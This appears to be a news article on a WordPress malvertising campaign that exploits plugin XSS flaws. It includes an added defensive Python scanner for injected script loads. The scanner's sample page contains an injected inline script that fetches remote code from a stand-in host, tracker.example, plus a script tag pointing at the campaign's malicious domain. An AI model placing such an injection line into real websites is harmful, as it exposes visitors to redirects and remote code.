A widespread and ongoing malicious advertising campaign is exploiting several recently-disclosed WordPress plugin vulnerabilities to redirect website visitors to booby-trapped landing pages.
Researchers at Wordfence said that they recently discovered bad actors injecting code into websites with the vulnerable plugins in order to display unwanted popup ads, as well as redirect site visitors to tech support scam pages, malicious Android APKs and sketchy pharmaceutical ads.
Attackers exploited a variety of recently disclosed WordPress plugin vulnerabilities, including cross-site scripting (XSS) flaws, to inject the malvertising code.
Several other vulnerabilities disclosed over the past few months were also exploited in earlier iterations of the malvertising campaign.
That includes a vulnerability in the Yellow Pencil Visual CSS Style Editor plugin (which has 30,000 installs) disclosed and patched in April, and a flaw in the Blog Designer plugin (which has more than 30,000 installations) that was disclosed and patched in May.
“At this time, all of the plugins with vulnerabilities they’re attempting to exploit either have patches available or have been discontinued by their developers and are unavailable for new installs,” Wordfence’s Mikey Veenstra told Threatpost.
The injected code is a short script that loads additional code from third-party URLs; that code runs in the visitor’s browser when the compromised website is opened.
“When the third-party code executes in a visitor’s browser, it performs an initial redirect to a central domain, which then performs another redirect to a new destination based on a number of factors, notably the type of device in use by the redirected user,” according to Wordfence.
The earliest confirmed activity associated with the campaign was tied to the registration of yourservice[.]live (one of the URLs being commonly sourced in the injected script on websites) in September 2018, Veenstra told Threatpost. However, he said that it didn’t necessarily mean they began an attack campaign at the same time.
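The injection described above, a short script that pulls further code from an external host, is what a site owner should be hunting for in rendered pages, theme files and post content. The following scanner is an added example, not Wordfence’s tooling or anything from the original report: it collects every `<script src>` and every URL embedded in an inline script, resolves the host, and classifies it as local, allowlisted, known bad or unknown external. The only indicator taken from the page is yourservice[.]live; the allowlist, the site hostname and the sample HTML (including tracker.example) are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"cdnjs.cloudflare.com"}

# Indicator named in the report, defanged on the page; normalised for matching.
KNOWN_BAD_HOSTS = {"yourservice[.]live".replace("[.]", ".")}

# Absolute http(s) URLs inside inline script bodies, e.g. s.src='https://...'
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []    # values of <script src=...>
        self.inline = []      # bodies of <script>...</script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers the raw script body as a single data chunk.
        if self._in_script:
            self.inline.append(data)


def classify_host(host, site_host):
    """Verdict for the host a script is loaded from."""
    if not host or host == site_host:
        return "local"            # relative path or same origin
    if host in KNOWN_BAD_HOSTS:
        return "known_bad"        # matches a published indicator
    if host in ALLOWED_SCRIPT_HOSTS:
        return "allowed"
    return "unknown_external"     # needs a human look


def scan_html(html, site_host):
    """Return (kind, url, host, verdict) for every script load found in html."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        # urlparse handles absolute, protocol-relative (//host/x.js) and relative srcs.
        host = urlparse(src).hostname or ""
        findings.append(("src", src, host, classify_host(host, site_host)))
    for body in collector.inline:
        # Injections often create a <script> element at runtime and set its src.
        for url in URL_RE.findall(body):
            host = urlparse(url).hostname or ""
            findings.append(("inline", url, host, classify_host(host, site_host)))
    return findings


def suspicious(findings):
    """Only the entries an operator should act on."""
    return [f for f in findings if f[3] in ("known_bad", "unknown_external")]


# Constructed sample page for the example; not captured from a real site.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/x/1.0/x.js"></script>
<script src="https://yourservice.live/loader.js"></script>
<script>var s=document.createElement('script');s.src='https://tracker.example/r.js';document.head.appendChild(s);</script>
</head><body>Hello</body></html>"""

if __name__ == "__main__":
    for kind, url, host, verdict in suspicious(scan_html(SAMPLE_PAGE, "example-site.test")):
        print(f"{verdict:17} {kind:6} {host:22} {url}")
```

Run it over the HTML returned by a curl of the site’s front page, and separately over the output of a database dump of `wp_posts` and `wp_options`, since the injection may live in either place; anything in the unknown_external bucket that you cannot explain is worth treating as hostile until proven otherwise.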
“We do know they were issuing attacks at scale by April of 2019, but the attacker’s TTPs [tactics techniques and procedures] change frequently enough that the campaign may have had a much different scope before then,” he said.
Plugins continue to be a security thorn in WordPress’ side: According to an Imperva report, almost all (98 percent) of WordPress vulnerabilities are related to plugins, which extend the functionality and features of a website or blog. Other recent vulnerabilities found in WordPress plugins include WP Live Chat and Yuzo Related Posts.
While the total number of infected websites is unknown, Veenstra told Threatpost that it’s reasonable to expect any site affected by a newly disclosed XSS flaw to be at risk in the near future.
“It’s difficult to estimate an expected impact in this case,” Veenstra told Threatpost. “Some plugins they’re attacking have been removed from the official repository, which makes version install counts hard to assess, and some were never there in the first place. The attackers still probe for months-old vulnerabilities, but quickly adopt new ones as they’re disclosed.”